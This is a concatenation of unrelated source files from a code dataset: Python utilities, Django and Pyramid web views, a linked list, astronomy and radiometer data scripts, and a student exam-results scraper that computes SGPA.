lwuag\n\"\"\"\n\ndef check_start_point(PathInfo, start_point, start_index, Height_pos, Data, threshold):\n col_num = int(Data.shape[2]) \n start_x = start_point // col_num\n start_y = start_point % col_num\n start_replace = start_point\n start_replace_index = start_index\n Stop = False\n if Data[Height_pos, start_x, start_y] >= threshold:\n Stop = True\n Temp = PathInfo[::-1]\n if Stop:\n i = 0\n Flag = False\n while i in range(min(30, len(Temp))) and not Flag:\n print(i)\n if Data[Height_pos, Temp[i]//col_num, Temp[i]%col_num] < threshold:\n Flag = True\n start_replace = Temp[i]\n start_replace_index = len(PathInfo) - 1 - i\n i = i + 1\n if Flag:\n PathInfo = PathInfo[0: start_replace_index] + [PathInfo[start_replace_index]] * (len(PathInfo) - start_replace_index)\n return start_replace, PathInfo\n \n \n ","sub_path":"Functions/Licheng/check_start_point.py","file_name":"check_start_point.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"604002701","text":"HEADERS = ['chapter']\r\nHUGE_VALUE = 10000\r\n\r\nclass NonSupportedBlockError(ValueError): pass\r\n\r\nclass Block:\r\n # loc: tuple of start and end line number (st, en)\r\n # loc = (-1,0) is for the first block containing the empty lines at\r\n # the beginning of the document in its self.emptyafter\r\n def __init__(self, l_lines, emptyafter=0):\r\n self.l_lines = l_lines\r\n self.emptyafter = emptyafter\r\n\r\n self.prev = None\r\n self.next = None\r\n self.dlink = None\r\n self.ulink = None\r\n self.llink = None\r\n self.rlink = None\r\n\r\n def leftmargin(self):\r\n '''Returns the column number of the left margin'''\r\n m = HUGE_VALUE\r\n for i in self.l_lines:\r\n m = min(m,len(i) - len(i.lstrip()))\r\n return m\r\n\r\n def rightmargin(self):\r\n '''Returns the column number of the left margin'''\r\n m = 0\r\n for i in self.l_lines:\r\n m = max(m,len(i))\r\n return m\r\n\r\n def centered(self, margin=None):\r\n '''Returns True if margin 
was given and if l_lines is centered.\r\n If no margin was given, returns the set of rightmargin(s) at which the content is centered.'''\r\n\r\n # At first it calculates the rightmargin value where the Block would be centered.\r\n # example \"...b\" gives {7}\r\n # \"...bl\" gives {7,8}\r\n c_i = set()\r\n for i in self.l_lines:\r\n c_ii = set()\r\n m = len(i) - len(i.lstrip())\r\n l_l = len(i.strip())\r\n\r\n if l_l % 2 == 0:\r\n # if content length is even value\r\n c_ii.add(l_l + 2*m -1)\r\n else:\r\n c_ii.add(l_l + 2*m +1)\r\n c_ii.add(l_l + 2*m)\r\n\r\n if not c_i:\r\n c_i = c_ii\r\n else:\r\n c_i = c_i & c_ii\r\n\r\n if margin in c_i and self.leftmargin():\r\n return True\r\n elif margin:\r\n return False\r\n else:\r\n return c_i\r\n\r\n def loc(self):\r\n l_n = []\r\n c = 0\r\n curr_pos = self\r\n while curr_pos.llink or curr_pos.ulink:\r\n c += 1\r\n if curr_pos.llink and not curr_pos.ulink:\r\n curr_pos = curr_pos.llink\r\n elif curr_pos.ulink and not curr_pos.llink:\r\n l_n.insert(0, c)\r\n c = 0\r\n curr_pos = curr_pos.ulink\r\n else:\r\n raise BothLeftAndUpLinkExistsError('ulink and rlink are mutually exclusive ATM!')\r\n return l_n\r\n\r\n def raw_content(self):\r\n c = ' '.join(self.l_lines)\r\n c = c.replace('\\u2010 ','') # remove hyphens\r\n while c.find(' ') > -1:\r\n c = c.replace(' ',' ') # trim double spaces\r\n return c.strip()\r\n\r\nclass DocumentHeader(Block):\r\n\r\n class FrontMatter(Block):\r\n\r\n class TitlePage(Block):\r\n def __init__(self):\r\n Block.__init__(self,[''])\r\n\r\n def __init__(self):\r\n Block.__init__(self,[''])\r\n self.titlepage = self.TitlePage()\r\n\r\n\r\n class MainMatter(Block):\r\n def __init__(self):\r\n Block.__init__(self,[''])\r\n\r\n class BackMatter(Block):\r\n def __init__(self):\r\n Block.__init__(self,[''])\r\n\r\n def __init__(self, emptyafter):\r\n Block.__init__(self,[''])\r\n self.emptyafter = emptyafter\r\n self.frontmatter = self.FrontMatter()\r\n self.mainmatter = self.MainMatter()\r\n self.backmatter = self.BackMatter()\r\n\r\nclass Heading(Block):\r\n def nr(self):\r\n loc = [str(i) for i in self.loc()]\r\n return '.'.join(loc)\r\n\r\nclass Author(Heading):\r\n pass\r\n\r\nclass Chapter(Heading):\r\n pass\r\n\r\nclass Title(Heading):\r\n pass\r\n\r\nclass SubTitle(Title):\r\n pass\r\n\r\nclass Paragraph(Block):\r\n def __init__(self, l_lines, emptyafter=0, indent=0):\r\n Block.__init__(self, l_lines, emptyafter)\r\n self.indent = len(self.l_lines[0]) - len(self.l_lines[0].lstrip())\r\n\r\n def nr(self):\r\n loc = [str(i) for i in self.loc()]\r\n return '.'.join(loc[:-1])+':'+loc[-1]\r\n\r\nclass Break(Block):\r\n def __init__(self, l_lines, emptyafter=0):\r\n Block.__init__(self, l_lines, emptyafter)\r\n","sub_path":"src/core/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"327647808","text":"import string\nimport random\n\ndef is_question(input_string):\n \n if '?' 
in input_string:\n output = True\n else:\n output = False\n return output\n\n\ndef remove_punctuation(input_string):\n \n out_string = ''\n \n for char in input_string:\n if char not in string.punctuation:\n out_string += char\n return out_string\n\n\ndef prepare_text(input_string):\n \n out_list = []\n \n input_string = input_string.lower()\n \n input_string = remove_punctuation(input_string)\n \n out_list = input_string.split()\n \n return out_list\n\ndef selector(input_list, check_list, return_list):\n \n output = None\n \n for item in input_list:\n if item in check_list:\n output = random.choice(return_list)\n break\n return output\n\n\ndef string_concatenator(string1, string2, separator):\n \n output = []\n \n output = string1 + separator + string2\n \n return output\n\n\ndef list_to_string(input_list, separator):\n \n output = input_list[0]\n \n for item in input_list[1:]:\n output = string_concatenator(output, item, separator)\n return output\n\n\ndef end_chat(input_list):\n \n output = bool()\n \n if 'quit' in input_list:\n output = True\n else:\n output = False\n return output\n\n\ndef is_in_list(list_one, list_two):\n \n for element in list_one:\n if element in list_two:\n return True\n return False\n\n\ndef find_in_list(list_one, list_two):\n \n for element in list_one:\n if element in list_two:\n return element\n return None\n\ndef select_language(language_input):\n \"\"\"Lets the user choose the language they prefer.\n \n Parameters\n ----------\n language : dictionary\n name of language used input : language used output\n \"\"\"\n if language_input.lower().startswith('eng'):\n language = 'english'\n elif language_input.lower().startswith('swe'):\n language = 'swedish'\n else:\n raise ValueError\n return language","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"458371701","text":"from django import forms\nfrom core.models.test_dao import TestDAO\nfrom django.forms import SelectDateWidget\n\nimport logging\n\ntestDAO = TestDAO()\nlogger = logging.getLogger(__name__)\n\n\ndef getTestSuitChoices():\n try:\n all_test_suits = testDAO.getAllTestSuites()\n test_suit_ids_lst = [(t.testSuiteId, t.created) for t in all_test_suits]\n TEST_SUIT_CHOICES = tuple(test_suit_ids_lst)\n except Exception as e:\n logger.error(\"Error in stats/forms while getting test suits: %s\" % e)\n return ((None, None),)\n else:\n return TEST_SUIT_CHOICES\n\nclass TestSuiteIdForm(forms.Form):\n test_id = forms.ChoiceField(choices=getTestSuitChoices())\n\n\nclass DatesToCompareForm(forms.Form):\n start_date = forms.DateField(\n widget=SelectDateWidget(years=range(2018,2020))\n )\n end_date = forms.DateField(\n widget=SelectDateWidget(\n years=range(2018, 2020),attrs={'class':'dateWidgetClass'}\n )\n )\n","sub_path":"src/stats/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"643518213","text":"from pyramid.response import Response\nfrom pyramid.view import view_config\nfrom cornice import Service\nimport pyramid.httpexceptions as exc\nimport logging\nimport sqlalchemy.exc\nimport pdb\nimport operator\nimport json\nfrom datetime import datetime\n\nfrom pi_director.models.models import (\n DBSession,\n RasPi,\n Tags\n )\n\nfrom pi_director.controllers.controllers import get_pi_info\n\nfrom pi_director.controllers.user_controls import (\n 
authorize_user,\n delete_user\n )\n\n\neditMAC = Service(name='PiUrl', path='/ajax/PiUrl/{uid}',\n description=\"Get/Set Pi URL Info\")\n\neditCommands = Service(name='EditPiCommands', path='/ajax/SendCommands/{uid}',\n description='Get/Set sendcommands info')\n\neditCommandResults = Service(name='EditPiCommandResults', path='/ajax/CommandResults/{uid}',\n description='Get/Set sendcommands info')\n\nAuthUser = Service(name='AuthUser', path='/ajax/User/{email}',\n description=\"Set User authentication\")\n\nlogger = logging.getLogger('ajax')\n\n\n@editMAC.get(permission='anon')\ndef view_json_get_pi(request):\n uid = request.matchdict['uid']\n return get_pi_info(uid)\n\n\n@editMAC.delete(permission='admin')\ndef view_json_delete_pi(request):\n uid = request.matchdict['uid']\n DBSession.query(RasPi).filter(RasPi.uuid == uid).delete()\n\n\n@editMAC.post(permission='admin')\ndef view_json_set_pi(request):\n # TODO: move into controller(s)\n uid = request.matchdict['uid']\n response = request.json_body\n\n row = DBSession.query(RasPi).filter(RasPi.uuid == uid).first()\n if row is None:\n row = RasPi()\n row.uuid = uid\n row.url = response['url']\n row.description = response['description']\n row.orientation = response['orientation']\n row.browser = response['browser']\n DBSession.add(row)\n DBSession.flush()\n rowdict = {\n 'uuid': row.uuid,\n 'url': row.url,\n 'description': row.description,\n 'orientation': row.orientation,\n 'browser': row.browser\n }\n return rowdict\n\n\n@editCommands.post(permission='admin')\ndef view_ajax_set_commands(request):\n uid = request.matchdict['uid']\n response = request.json_body\n\n row = DBSession.query(RasPi).filter(RasPi.uuid == uid).first()\n if row is None:\n return '{\"status\":\"error\"}'\n\n # convert response into something with stable sorting\n cmds = []\n tmpcmds = sorted(response.items(), key=operator.itemgetter(0))\n for tmptuple in tmpcmds:\n # extract cmdid/cmd\n cmdid = int(tmptuple[0])\n cmd = tmptuple[1]['cmd']\n del tmptuple[1]['cmd']\n\n # extract arguments\n tmpargs = sorted(tmptuple[1].items(), key=operator.itemgetter(0))\n args = [item[1] for item in tmpargs]\n\n # put into our cmd object in the correct order\n cmds.insert(cmdid, {})\n cmds[cmdid]['cmd'] = cmd\n cmds[cmdid]['args'] = args\n\n # command hasn't been run yet, so this is blank\n cmds[cmdid]['result'] = ''\n\n row.requested_commands = json.dumps(cmds)\n DBSession.flush()\n\n return str(cmds)\n\n\n@editCommandResults.get(permission='admin')\ndef view_ajax_get_command_results(request):\n uid = request.matchdict['uid']\n\n row = DBSession.query(RasPi).filter(RasPi.uuid == uid).first()\n if row is None:\n return {'status': 'error'}\n\n data = json.loads(row.requested_commands)\n\n return {'status': 'OK', 'data': data}\n\n\n@editCommandResults.post(permission='admin')\ndef view_ajax_set_command_results(request):\n uid = request.matchdict['uid']\n\n row = DBSession.query(RasPi).filter(RasPi.uuid == uid).first()\n if row is None:\n return {'status': 'error'}\n\n row.requested_commands = ''\n DBSession.flush()\n\n return {'status': 'OK'}\n\n\n@AuthUser.post(permission='admin')\ndef view_ajax_set_user_level(request):\n email = request.matchdict['email']\n authorize_user(email)\n return '{\"status\":\"OK\"}'\n\n\n@AuthUser.delete(permission='admin')\ndef view_ajax_delete_user(request):\n email = request.matchdict['email']\n delete_user(email)\n return 
'{\"status\":\"OK\"}'\n\n","sub_path":"pi_director/views/ajax.py","file_name":"ajax.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"13269465","text":"class LinkedList:\n \"\"\" A singly-linked linked list with a single head reference\n \"\"\"\n def __init__(self):\n self.head = None\n\n def __repr__(self):\n cur = self.head\n s = ''\n while cur is not None:\n s += '[{}]->'.format(cur.item)\n cur = cur.next\n s += 'NULL'\n return s\n\n def append(self, val):\n n = Node(val)\n if self.head is None:\n self.head = n\n return\n\n cur = self.head\n prev = None\n while cur is not None:\n prev = cur\n cur = cur.next\n\n prev.next = n\n\n def reverse(self):\n cur = self.head\n prev = None\n while cur is not None:\n nxt = cur.next\n cur.next = prev\n prev = cur\n cur = nxt\n self.head = prev\n\n def insert(self, val, i):\n cnt = 0\n cur = self.head\n prev = None\n while cur is not None and cnt < i:\n prev = cur\n cur = cur.next\n cnt += 1\n\n n = Node(val)\n n.next = cur\n if prev is None:\n self.head = n\n else:\n prev.next = n\n \n def pop(self, ndx):\n cnt = 0\n cur = self.head\n prev = None\n while cur is not None and cnt < ndx:\n prev = cur\n cur = cur.next\n cnt += 1\n if ndx == cnt and cur is not None:\n if prev is None:\n self.head = self.head.next\n return cur.item\n else:\n prev.next = cur.next\n return cur.item\n\n def remove(self, val):\n cur = self.head\n prev = None\n while cur is not None:\n if cur.item == val:\n if prev is None:\n self.head = self.head.next\n else:\n prev.next = cur.next\n return\n prev = cur\n cur = cur.next\n\n\n\n\nclass Node:\n def __init__(self, val=None):\n self.item = val\n self.next = None\n\nif __name__ == \"__main__\":\n print('LinkedLists')\n l = LinkedList()\n for i in range(5):\n l.append(i)\n print(repr(l))\n l.insert('i10', 10)\n l.insert('i4', 4)\n l.insert('i0', 0)\n print(l)\n l.reverse()\n print(repr(l))\n l.reverse()\n print(l.pop(0))\n print(l.pop(4))\n print(l.pop(10))\n print(l)\n l.remove('i10')\n print(l)\n l.remove(0)\n l.remove(2)\n print(l)\n","sub_path":"llists.py","file_name":"llists.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"90245774","text":"#Author: Emma Carli \n#INITIALISATION\n#clear variables?\nimport numpy as np\nimport interpacf\nimport astropy.stats\nfrom numpy import mean, sqrt, square\nfrom astropy.table import Table \nk=-1 #k will be the star number in our list (the order is not significant)\nrmstable=np.zeros((66,2)) #This will be a dataset with the star's EPIC ID as the first column, and the other columns are the periods (rough and regular) and their error\nstartlist=np.genfromtxt(r\"C:\\Users\\New\\OneDrive - University of Glasgow\\Work\\Internship LAM\\Gaussian Processes\\start.txt\")\n\n\n# =============================================================================\n#PICKING A STAR\nf = open(r\"C:\\Users\\New\\OneDrive - University of Glasgow\\Work\\Internship LAM\\STARS.txt\") #Open the list of stars considered in this project\nstar = f.readline() #Read the first line of the text file\nwhile star: #Keep reading one line at a time till you get to the end of the list.\n starlist=list(star) #Turn the star's name into a list\n del starlist[9] #Remove the \"return\" character\n starint=int(float(star))\n #Here we create the link to the POLAR txt file corresponding to this star\n 
linklist=list(r\"C:\\Users\\New\\OneDrive - University of Glasgow\\Work\\Internship LAM\\Polar Detrended LCs\\ktwo211418016c16_lpd_LC.txt\") #Take a random link to a POLAR txt file and make it a list\n newlinklist = linklist[:91] + starlist +linklist[100:] #Replace the EPIC ID in the link using the stellar ID list\n link=''.join(newlinklist) #Create the link\n# ============================================================================= \n \n # =============================================================================\n #RETRIEVING THE LIGHT CURVE\n if starint in [211699606, 212006344, 211427097]:\n linklist=list('https://archive.stsci.edu/hlsps/k2sff/c16/211300000/90837/hlsp_k2sff_k2_lightcurve_211390837-c16_kepler_v1_llc-default-aper.txt') #Take a random link to an EVEREST FITS file and make it a list\n newlinklist = linklist[:42] + starlist[0:4] + linklist[46:52] + starlist[4:9] + linklist[57:83] + starlist +linklist[92:] #Fill in EPIC ID occurrences in the link using the stellar ID list\n link=''.join(newlinklist) #Create the link\n data=np.genfromtxt(link, skip_header=1, delimiter=',')\n time=data[:,0]\n flux=data[:,1] \n error=np.zeros_like(flux)\n else:\n #Here we create the link to the POLAR txt file corresponding to this star\n linklist=list(r\"C:\\Users\\New\\OneDrive - University of Glasgow\\Work\\Internship LAM\\Polar Detrended LCs\\ktwo211418016c16_lpd_LC.txt\") #Take a random link to a POLAR txt file and make it a list\n newlinklist = linklist[:90] + starlist +linklist[99:] #Replace the EPIC ID in the link using the stellar ID list\n link=''.join(newlinklist) #Create the link\n data=np.genfromtxt(link) #Here the column data from the POLAR txt file is retrieved\n time=data[:,0] #And the two colums are separated\n flux=data[:,1] \n error=data[:,2]\n # =============================================================================\n \n # =============================================================================\n #REMOVAL OF START AND/OR END\n if starint in [211814413, 211827122, 211696686] :\n flux=flux[(time <= 58170)]\n time = time[(time <= 58170)]\n if starint in startlist:\n flux=flux[(time >= 58100)]\n time = time[(time >= 58100)]\n # =============================================================================\n \n # =============================================================================\n #DATA CLEANING \n time=time[~np.isnan(flux)] #Remove timestamps corresponding to flux NaNs\n flux = flux[~np.isnan(flux)] #Remove NaNs in the flux\n sigmaclip=astropy.stats.sigma_clip(flux,3) #Perform sigma-clipping with sigma=3, value chosen arbitrarily\n mask=sigmaclip.mask #Retrieve the boolean mask of the sigma clipping\n flux=flux[~mask] #Remove the outliers from the flux\n time=time[~mask] #Remove the timestamps corresponding to the outliers\n flux=flux-(np.median(flux)) #Normalise to 0 to be able to perform ACF (McQuillan et al. 
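# The per-star statistic computed further below is the root-mean-square of the
# median-subtracted, 2-hour-rebinned flux, i.e. a simple photometric-scatter
# proxy for stellar activity.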
2013)\n [time,flux]=interpacf.interpolate_missing_data(time,flux) #Interpolate data in case of non regular long cadences\n # =============================================================================\n \n \n # ============================================================================= \n #REBINNING \n #Downsample the data to 2 hours instead of 30 minutes (4 times smaller dataset)\n end = 4 * int(len(flux)/4) \n flux=np.mean(flux[:end].reshape(-1, 4), 1)\n time=np.mean(time[:end].reshape(-1, 4), 1)\n # =============================================================================\n \n rms = sqrt(mean(square(flux)))\n \n k=k+1 #Go to the next line in the table containing rms\n #Fill in the table : ID of the star followed by the stellar activity rms\n rmstable[k][0]=int(star)\n rmstable[k][1]=rms\n \n star = f.readline() #Proceed to reading next line of text file \nf.close() #Close the file (the list of stars)\n\n\nrms_table=Table(rmstable,names=['ID','RMS']) #Make an astropy table with the data for easy handling\nrms_table.write('RMS Table.html') #Retrieve the astropy table as an html table","sub_path":"Auxiliary_Codes/RMS finder.py","file_name":"RMS finder.py","file_ext":"py","file_size_in_byte":5342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"304288155","text":"from flask import Flask\nimport logging\nfrom logging.handlers import TimedRotatingFileHandler\n\napp = Flask(__name__)\napp.config.from_object('config')\n\n\nfile_handler = TimedRotatingFileHandler('app/log/astronomer.log', when=\"W0\", backupCount=0)\nfile_handler.setLevel(logging.INFO)\nfile_handler.setFormatter(logging.Formatter('%(asctime)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S'))\napp.logger.addHandler(file_handler)\napp.logger.setLevel(logging.INFO)\napp.logger.info('---------------------astronomer startup-------------------------')\n\nif __name__ == '__main__':\n app.run()\n\nfrom app import views\n\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"423307370","text":"import numpy as np\nimport numpy.ma as ma\nimport os\nimport re\nfrom datetime import timedelta, datetime\nimport pdb\n\ndef get_am_templates(time, wvr, angle):\n # Load fast file; first 4 rows are text; columns 3, 7, 11, 15 are the\n # A channels, columns 5, 9, 13, 17 are B, and column 18 is the elevation\n if wvr == 'wvr1':\n datafile = f'wvr1/{time}_skyDip_fast.txt'\n elif wvr == 'wvr2':\n datafile = f'wvr2/{time}_skyDip_fast.txt'\n data_el = np.loadtxt(datafile, skiprows=4, usecols=(18))\n # The indices where it is pointing straight up are\n zenith = np.where(np.logical_and(data_el > angle-0.5, data_el < angle+0.5)) \n data_A = np.loadtxt(datafile, skiprows=4, usecols=(3,7,11,15))\n data_B = np.loadtxt(datafile, skiprows=4, usecols=(5,9,13,17))\n data_C = np.loadtxt(datafile, skiprows=4, usecols=(2,6,10,14))\n data_H = np.loadtxt(datafile, skiprows=4, usecols=(4,8,12,16))\n # Picks out rows where channel A is being read (at zenith), do same with B\n data_A = np.array([row for row in data_A[zenith] if row[0] > 0])\n data_B = np.array([row for row in data_B[zenith] if row[0] > 0])\n data_C = np.array([row for row in data_C[zenith] if row[0] > 0])\n data_H = np.array([row for row in data_H[zenith] if row[0] > 0])\n # Convert to Rayleigh Jeans source brightness temperature\n # First, throw away last data rows if necessary, to make data arrays same 
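# The hot/cold-load conversion a few lines below is the standard two-point
# radiometer calibration (per the WVR Operation Manual cited there):
#     gain G  = (V_hot - V_cold) / (T_hot - T_cold)
#     V_ref   = (V_hot + V_cold) / 2,  T_ref = (T_hot + T_cold) / 2
#     T_sky   = T_ref + (V_channel - V_ref) / G
# where data_H and data_C play the roles of V_hot and V_cold.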
size\n min_dim = min([len(data_A), len(data_B), len(data_C), len(data_H)])\n data_A = data_A[:min_dim,:]\n data_B = data_B[:min_dim,:]\n data_C = data_C[:min_dim,:]\n data_H = data_H[:min_dim,:]\n # Now using formulae in WVR Operation Manual page 10\n V_ref = (data_H + data_C)/2\n T_hot = 363.15 # In K, with error 0.01 K\n T_cold = 283.15 # In K, with error 0.01 K\n T_ref = (T_hot + T_cold)/2\n G = (data_H - data_C)/(T_hot - T_cold)\n data_A = T_ref + (data_A - V_ref)/G\n data_B = T_ref + (data_B - V_ref)/G\n # Throw away negative values\n data_el[data_el < 0] = np.nan\n data_A[data_A < 0] = np.nan\n data_B[data_B < 0] = np.nan\n filename = f'./{wvr}_am_{angle}deg/{time}_{angle}deg.dat'\n with open(filename, 'w+') as f:\n data0 = (np.mean(data_A[:,0])+np.mean(data_B[:,0]))/2\n data1 = (np.mean(data_A[:,1])+np.mean(data_B[:,1]))/2\n data2 = (np.mean(data_A[:,2])+np.mean(data_B[:,2]))/2\n data3 = (np.mean(data_A[:,3])+np.mean(data_B[:,3]))/2\n f.write('1.25 1.50 {0}\\n'.format(data0))\n f.write('3.25 2.50 {0}\\n'.format(data1))\n f.write('5.5 2.00 {0}\\n'.format(data2))\n f.write('7.25 1.50 {0}'.format(data3))\n","sub_path":"get_am_templates.py","file_name":"get_am_templates.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"417330340","text":"#All imports\nimport requests\nimport http.client \nfrom time import sleep\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport os\nimport timeit\nimport sys\nimport winsound\n####################################################################\n#Random initializations\nglobal gradesum\n\ncount=0 \n\nccurl=0 #starting college code\nccend=100 #ending college code\n\nurlerror=0 #number of urlerrors,will check if its greater than 6 and terminate\n\nstart_time = timeit.default_timer()\n\n\nvar1=0\nvar2=0\n\nskip=0\n\nusn=92\nuusn=\"\"\nnuerror=0\nccycle=\"P\"\ncdone=\"false\"\n\n#college lists\nclist=[\"1cd\",\"1cg\",\"1ce\",\"1dt\",\"1ds\",\"1db\",\"1da\",\"1cc\",\"1gv\",\"1ec\",\"1ep\",\"1ew\",\"1gs\",\"1gc\",\"1ga\",\"1gd\",\"1sk\",\"1gg\",\"1hk\",\"1hm\",\"1ic\",\"1ii\",\"1jv\",\"1js\",\"1jt\",\"1ks\",\"1ki\"]\n#clist=[\"1KS\"]\n####################################################################\n\n#Urls\nurl1=\"http://results.vtu.ac.in/vitaviresultcbcs/resultpage.php\"\nurl5=\"\"\n\nurl31=\"16\"\nurl32=\"CS\"\nurl3=url31+url32\nsusn=\"\"\n\n\ngradesum=0\nln=0\n#####################################################################\n#Calulations\n\n#loop through all given colleges\nwhile ln<=2:\n\t#Get current college code \n\t#ucc=(clist[ccurl]).upper()\n\tucc=\"1KS\"\n\ttext_file = open(\"00-sen-Sem1.txt\", \"a\")\n\t\t\n\tif(cdone==\"done\" or skip>5):\n\t\tprint(\"\\nGoing to next college\")\n\t\ttext_file.close()\n\t\ttext_file = open(\"00-17.txt\", \"a\")\n\t\t#No more usn's remaining,go to next college\n\t\tcdone=\"false\"\n\t\tccurl=ccurl+1\n\t\tusn=0\n\t\tnuerror=0\n\t\t\n\telif(cdone==\"y\"):\n\t\tsys.exit(0)\n\telse:\n\t\tsgpa=0\n\t\t\n\n\t\tln=ln+1\n\t\tprint(ln)\n\t\t\n\t\tnuerror=0\n\t\tusn=92\n\t\tskip=0\n\t\t#Get VTU URL\n\t\t#usn=usn+1\n\t\t\n\t\tif(usn==93):\n\t\t\tsys.exit(0)\n\t\telif(usn<10):\n\t\t\tif(usn>8):\n\t\t\t\tsys.exit(0)\n\t\t\tuusn=\"00\"+str(usn)\n\t\telif(usn<100):\n\t\t\tuusn=\"0\"+str(usn)\n\t\telse:\n\t\t\tuusn=str(usn)\n\t\turl=url1+ucc+url3+uusn+url5\n\t\tsusn=ucc+url3+uusn\n\t\tultusn=ucc+url3+uusn+url5\n\t\t\n\t\tprint(ultusn)\n\t\ttry:\n\t\t\tresponse 
=requests.post('http://localhost/vt3.html', data={'usn':ultusn}, timeout=30)\n\t\t\t\t\n\t\t\tsoup = BeautifulSoup(response.content,\"html.parser\")\n\t\t\t\n\t\t\ttables = soup.findChildren(\"div\", {\"class\":\"divTableBody\"})\n\n\t\t\tnames=soup.find(\"td\", {\"style\":\"padding-left:15px\"})\n\t\t\tfor name in names:\n\t\t\t\tname2=name.string\n\t\t\t\tprint(name2.replace(\":\",\"\"))\n\t\n\t\t\trows = tables[0].findChildren(\"div\", {\"class\":\"divTableRow\"})\n\t\n\t\t\tll=1\n\t\t\ti1=i2=i3=i4=i5=i6=i7=i8=0;\n\t\t\tsgpa=0\n\t\t\tvaluen=4\n\t\t\tvaluesum=0\n\t\t\tgradesum=0\n\t\t\t\n\t\t\ti1 = rows[1].findAll(\"div\", {\"class\": \"divTableCell\"})[4].string\n\t\t\ti2 = rows[2].findAll(\"div\", {\"class\": \"divTableCell\"})[4].string\n\t\t\ti3 = rows[3].findAll(\"div\", {\"class\": \"divTableCell\"})[4].string\n\t\t\ti4 = rows[4].findAll(\"div\", {\"class\": \"divTableCell\"})[4].string\n\t\t\ti5 = rows[5].findAll(\"div\", {\"class\": \"divTableCell\"})[4].string\n\t\t\ti6 = rows[6].findAll(\"div\", {\"class\": \"divTableCell\"})[4].string\n\t\t\ti7 = rows[7].findAll(\"div\", {\"class\": \"divTableCell\"})[4].string\n\t\t\ti8 = rows[8].findAll(\"div\", {\"class\": \"divTableCell\"})[4].string\n\t\t\tvar1=0\n\t\t\tfor row in rows:\n\t\t\t\tvolume = row.findAll(\"div\", {\"class\": \"divTableCell\"})[4].string\n\t\n\t\t\t\tif var1!=0:\n\t\t\t\t\tvalue=int(volume)\n\t\t\t\t\t\n\t\t\t\t\tif (var1==7 or var1==8):\n\t\t\t\t\t\tvar2=2\n\t\t\t\t\telse:\n\t\t\t\t\t\tvar2=4\n\t\n\t\n\t\t\t\t\tif(value>=40 and value<45):\n\t\t\t\t\t\tvalue2=4\n\t\t\t\t\telif(value>=45 and value<50):\n\t\t\t\t\t\tvalue2=5\n\t\t\t\t\telif(value>=50 and value<60):\n\t\t\t\t\t\tvalue2=6\n\t\t\t\t\telif(value>=60 and value<70):\n\t\t\t\t\t\tvalue2=7\n\t\t\t\t\telif(value>=70 and value<80):\n\t\t\t\t\t\tvalue2=8\n\t\t\t\t\telif(value>=80 and value<90):\n\t\t\t\t\t\tvalue2=9\n\t\t\t\t\telif(value>=90):\n\t\t\t\t\t\tvalue2=10\n\t\t\t\t\telif(value<40):\n\t\t\t\t\t\tvalue2=0\n\t\t\t\t\tgradesum=gradesum+(value2*var2)\n\t\t\n\t\n\t\t\t\tvar1=var1+1\n\t\t\tsgpa=round((gradesum/28),2)\n\n\t\t\tif(sgpa==0):\n\t\t\t\tnuerror=nuerror+1\n\t\t\t\tif(nuerror>6):\n\t\t\t\t\tcdone=\"done\"\n\t\t\t\t\tbreak\n\t\n\t\t\telse:\n\t\t\t\tprint ('{0},{1},{2},{3},{4},{5},{6},{7},{8},{9},{10}'.format(ucc,susn,sgpa,i1,i2,i3,i4,i5,i6,i7,i8))\n\t\t\t\ttext_file.write('{0},{1},{2},{3},{4},{5},{6},{7},{8},{9},{10}\\n'.format(ucc,susn,sgpa,i1,i2,i3,i4,i5,i6,i7,i8))\n\t\t\t\ttext_file.close()\n\t\n\t\t\t\ttext_file = open(\"00-Sem1.txt\", \"a\")\n\t\t\t\tnuerror=0\n\t\t\t\tskip=0\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tusn=usn-1\n\t\t\tnuerror=nuerror+1\n\t\t\tif(nuerror>3):\n\t\t\t\tif(skip>4):\n\t\t\t\t\tcdone=\"y\"\n\t\t\t\telse:\n\t\t\t\t\tprint(\"Skipping usn \")\n\t\t\t\t\tskip=skip+1\n\t\t\t\t\tusn=usn+1\n\t\t\t\t\tnuerror=0\n\t\t\tprint(\"Error\")\n\t\t\tcontinue\n\n\t\ndef getMarks(cell,valuen):\n\tglobal gradesum\n\tvalue = int(cell.string)\n\tif(value>=40 and value<45):\n\t\t\tvalue2=4\n\tif(value>=45 and value<50):\n\t\t\tvalue2=5\n\tif(value>=50 and value<60):\n\t\t\tvalue2=6\n\tif(value>=60 and value<70):\n\t\t\tvalue2=7\n\tif(value>=70 and value<80):\n\t\t\tvalue2=8\n\tif(value>=80 and value<90):\n\t\t\tvalue2=9\n\tif(value>=90):\n\t\t\tvalue2=10\n\tif(value<40):\n\t\t\tvalue2=0\n\tgradesum=gradesum+(value2*valuen)\n\t#return gradesum\n\t\nprint(\"My watch has ended\")\nelapsed = timeit.default_timer() - 
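# SGPA recap for the marks loop above: subjects 1-6 carry 4 credits and
# subjects 7-8 carry 2 (var2), marks map to 10-point grade bands (40-44 -> 4,
# ..., >=90 -> 10), and the weighted sum is divided by the 6*4 + 2*2 = 28
# total credits before rounding to 2 decimals.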
